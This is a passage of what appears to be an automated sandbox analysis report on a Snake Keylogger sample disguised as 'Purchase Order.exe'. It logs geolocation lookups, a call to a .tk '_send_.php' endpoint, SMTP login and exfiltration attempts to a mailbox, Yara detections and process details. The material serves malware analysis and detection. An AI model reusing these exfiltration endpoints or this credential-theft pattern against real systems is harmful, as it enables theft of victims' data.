2024-04-04 08:27:57 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-04 08:27:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49713	104.21.67.152	443	3304	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 08:27:58 UTC	64	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org
2024-04-04 08:27:58 UTC	712	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 08:27:58 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 69859 Last-Modified: Wed, 03 Apr 2024 13:03:39 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0rZXdXb0rt1QawcrJqT%2FZ2a6mrPj1Oi%2BqnIO3UVE9SM%2BVHma8UmslwONzUcPBKKCcz%2FErJemaRPY8m4bbvoYjTYDM8i%2Bxnv3Gg1YFc4RoOUrRoI5tXX6l4LB%2F95ioX3oHhCSx1bO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86efec1a1dac5c86-MIA alt-svc: h3=":443"; ma=86400
2024-04-04 08:27:58 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-04 08:27:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49715	104.21.67.152	443	3304	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 08:27:59 UTC	88	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-04 08:27:59 UTC	706	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 08:27:59 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 69860 Last-Modified: Wed, 03 Apr 2024 13:03:39 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jmtz9c6e0wZQzNxsysDxjk07ZGSc7jTSwZpIb9MesUVnEHoWnt8xJCqvnSZd2ZPRG121zCmpJxmqDYG%2BrVI2HXO9Gw2UpMCozS%2BlZPuoShNa%2FJ8UW5RX13fZDCVf3iLDEjWm2L5T"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86efec207a6b7431-MIA alt-svc: h3=":443"; ma=86400
2024-04-04 08:27:59 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-04 08:27:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49717	104.21.67.152	443	3304	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 08:28:00 UTC	88	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-04 08:28:00 UTC	716	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 08:28:00 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 69861 Last-Modified: Wed, 03 Apr 2024 13:03:39 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ybWN%2Fp9tvdw6NqxY%2Fv4MbnkedicQQ4xrgs4PAxVZA%2BC2IWe%2B31VdUyeLlcfQJk%2BSVOMfrzmHFnp2K7pC7iK%2Fz6CVgJHZyolvJGgjLzdKb0qHYeIY3e0Q9YxoFspOphocsY%2Fv%2BnHK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86efec26d8fc7446-MIA alt-svc: h3=":443"; ma=86400
2024-04-04 08:28:00 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-04 08:28:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49719	104.21.67.152	443	3304	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 08:28:01 UTC	88	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-04 08:28:01 UTC	712	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 08:28:01 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 69862 Last-Modified: Wed, 03 Apr 2024 13:03:39 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bKdabQl4yyidTFIfyA9%2BhU3KfLapgUhQ%2Fb%2Bkv%2BKv7Jn4kbszbwtFC3cPshegV0M863HUPChYYxXg2hLD2cDEVSoxkIQ%2B88shvslTb6bzooIE2fihTx0Dc4ZfzW16%2BShGRlUcvYJt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86efec2d9f64dae9-MIA alt-svc: h3=":443"; ma=86400
2024-04-04 08:28:01 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-04 08:28:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49721	104.21.67.152	443	3304	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 08:28:02 UTC	88	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-04 08:28:02 UTC	704	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 08:28:02 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 69863 Last-Modified: Wed, 03 Apr 2024 13:03:39 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OSd3jmotJCyLY9%2BoeuRLOf7jpGkjg8hvoWB2TVbhtOWNijNEWKhjB34Jhv3pZ8xkZ8L3TPmIHC0oH1U%2Fch0PyOEF0hmOcLtPLmDP6sH77X9kHSNRLlfLsVl0MMr1ByIK1nh6vc70"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86efec340eef8df1-MIA alt-svc: h3=":443"; ma=86400
2024-04-04 08:28:02 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-04 08:28:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49723	104.21.67.152	443	3304	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 08:28:03 UTC	64	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org
2024-04-04 08:28:03 UTC	714	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 08:28:03 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 69864 Last-Modified: Wed, 03 Apr 2024 13:03:39 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t%2BRPBDh9%2FsjepCdSIk%2Bkm2KQLv36UTEf6c1duLapZFd8CFz%2FHW4dQOQPASynI6UZT8InRlLZDlgvRfBHwDy4SdDjQmHegA0kOpIzBJ26%2B8QlkV%2FmMiMTSD7Q%2Fg8bf3S6adjU7lNO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86efec3a78886dd4-MIA alt-svc: h3=":443"; ma=86400
2024-04-04 08:28:03 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-04 08:28:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49724	172.67.169.18	443	3304	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 08:28:04 UTC	79	OUT	GET /_send_.php?TS HTTP/1.1 Host: scratchdreams.tk Connection: Keep-Alive
2024-04-04 08:28:35 UTC	735	IN	HTTP/1.1 522 Date: Thu, 04 Apr 2024 08:28:35 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gKSV0bYfqw%2BLXAaunqG4lr0VdHAe%2FQqNLyKJyY1uBcmv4PzfuQYGx8rnQnQtoXvEAtbGIKvjvIOIIBkl2u8XrRhF%2FEd4rskCJqjnWvBiE3gEVgySIYUutm3PwMH0TlGI3DBs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 86efec406aa6334f-MIA alt-svc: h3=":443"; ma=86400
2024-04-04 08:28:35 UTC	15	IN	Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32 Data Ascii: error code: 522

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Apr 4, 2024 10:28:41.735502958 CEST	587	49733	208.91.198.143	192.168.2.5	220 us2.outbound.mailhostbox.com ESMTP Postfix
Apr 4, 2024 10:28:41.735698938 CEST	49733	587	192.168.2.5	208.91.198.143	EHLO 830021
Apr 4, 2024 10:28:41.932111979 CEST	587	49733	208.91.198.143	192.168.2.5	250-us2.outbound.mailhostbox.com 250-PIPELINING 250-SIZE 41648128 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING
Apr 4, 2024 10:28:41.933192015 CEST	49733	587	192.168.2.5	208.91.198.143	AUTH login dHNsb2dzQG1rc2lpbXN0LmNvbQ==
Apr 4, 2024 10:28:42.131150007 CEST	587	49733	208.91.198.143	192.168.2.5	334 UGFzc3dvcmQ6
Apr 4, 2024 10:28:42.333214045 CEST	587	49733	208.91.198.143	192.168.2.5	235 2.7.0 Authentication successful
Apr 4, 2024 10:28:42.333444118 CEST	49733	587	192.168.2.5	208.91.198.143	MAIL FROM:<tslogs@mksiimst.com>
Apr 4, 2024 10:28:42.530410051 CEST	587	49733	208.91.198.143	192.168.2.5	250 2.1.0 Ok
Apr 4, 2024 10:28:42.530620098 CEST	49733	587	192.168.2.5	208.91.198.143	RCPT TO:<tslogs@mksiimst.com>
Apr 4, 2024 10:28:42.746668100 CEST	587	49733	208.91.198.143	192.168.2.5	550 5.4.6 <tslogs@mksiimst.com>: Recipient address rejected: Email Sending Quota Exceeded

Target ID:	0
Start time:	10:27:47
Start date:	04/04/2024
Path:	C:\Users\user\Desktop\Purchase Order.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Purchase Order.exe"
Imagebase:	0x240000
File size:	545'792 bytes
MD5 hash:	654C1586B15A278983493F57F72CACB7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:27:53
Start date:	04/04/2024
Path:	C:\Users\user\Desktop\Purchase Order.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Purchase Order.exe"
Imagebase:	0x340000
File size:	545'792 bytes
MD5 hash:	654C1586B15A278983493F57F72CACB7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	10:27:53
Start date:	04/04/2024
Path:	C:\Users\user\Desktop\Purchase Order.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Purchase Order.exe"
Imagebase:	0xc70000
File size:	545'792 bytes
MD5 hash:	654C1586B15A278983493F57F72CACB7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.4420689970.0000000003262000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.4420689970.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	212
Total number of Limit Nodes:	16

Executed Functions

Function 06D67D0C Relevance: .6, Instructions: 611COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 635f0190be8e91ee18756272eda58ec8ec62f45ee53dff561b93ff8179fab790
Instruction ID: 594502253dfae3933b3c8e9700f2fd8699ab2c254492e96de0a353043aa147b3
Opcode Fuzzy Hash: 635f0190be8e91ee18756272eda58ec8ec62f45ee53dff561b93ff8179fab790
Instruction Fuzzy Hash: C4D1CA70B017048FDBA5DB76C850BAEB7F6AF88300F1484A9E156CB691DF35D801DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00C2D6D8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00C2D756
GetCurrentThread.KERNEL32 ref: 00C2D793
GetCurrentProcess.KERNEL32 ref: 00C2D7D0
GetCurrentThreadId.KERNEL32 ref: 00C2D829

Memory Dump Source

Source File: 00000000.00000002.2013861741.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Purchase Order.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: c2598f109c8af732b17ce9d5618d4690df5df690aa5c20f054e490ba8737a604
Instruction ID: 9b0cb4efd1c24d789e28442b998355f460a01f9fb9f8674fac3920155fa4b189
Opcode Fuzzy Hash: c2598f109c8af732b17ce9d5618d4690df5df690aa5c20f054e490ba8737a604
Instruction Fuzzy Hash: E75146B4D002098FDB14DFAAE548BDEBBF1FF88304F208459E459A7351DB745984CB66

Uniqueness

Uniqueness Score: -1.00%

Function 06D64285 Relevance: 1.7, APIs: 1, Instructions: 245
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D644C6

Memory Dump Source

Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: f3e7f6f4f03ad6e6d8e909ebf6ee2cd861a2c48e230c27dc4f1d44494d67cd14
Instruction ID: 3062bcc77e212f529250bb580c3f6471459ed1107eab132d2e862e81e630b769
Opcode Fuzzy Hash: f3e7f6f4f03ad6e6d8e909ebf6ee2cd861a2c48e230c27dc4f1d44494d67cd14
Instruction Fuzzy Hash: E4A15971D00219CFDB64DF69C8417EDBBF2BF49314F1485A9E809A7280DB74A985CF92

Uniqueness

Uniqueness Score: -1.00%

Function 06D64290 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D644C6

Memory Dump Source

Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: ae968fb13a2233f73012c1c07c32becde8d4ca19156810bad4ad7ddd1d942bce
Instruction ID: b69a93d706b7257c911cd8cef1cdec740607787581313fffc10c42a4f541a1c7
Opcode Fuzzy Hash: ae968fb13a2233f73012c1c07c32becde8d4ca19156810bad4ad7ddd1d942bce
Instruction Fuzzy Hash: 72915A71D00219DFDB64CF69C8417EDBBF2BF49314F1485A9E809A7240DB74A985CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00C2B038 Relevance: 1.7, APIs: 1, Instructions: 203
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00C2B29E

Memory Dump Source

Source File: 00000000.00000002.2013861741.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Purchase Order.jbxd

Similarity

API ID: HandleModule
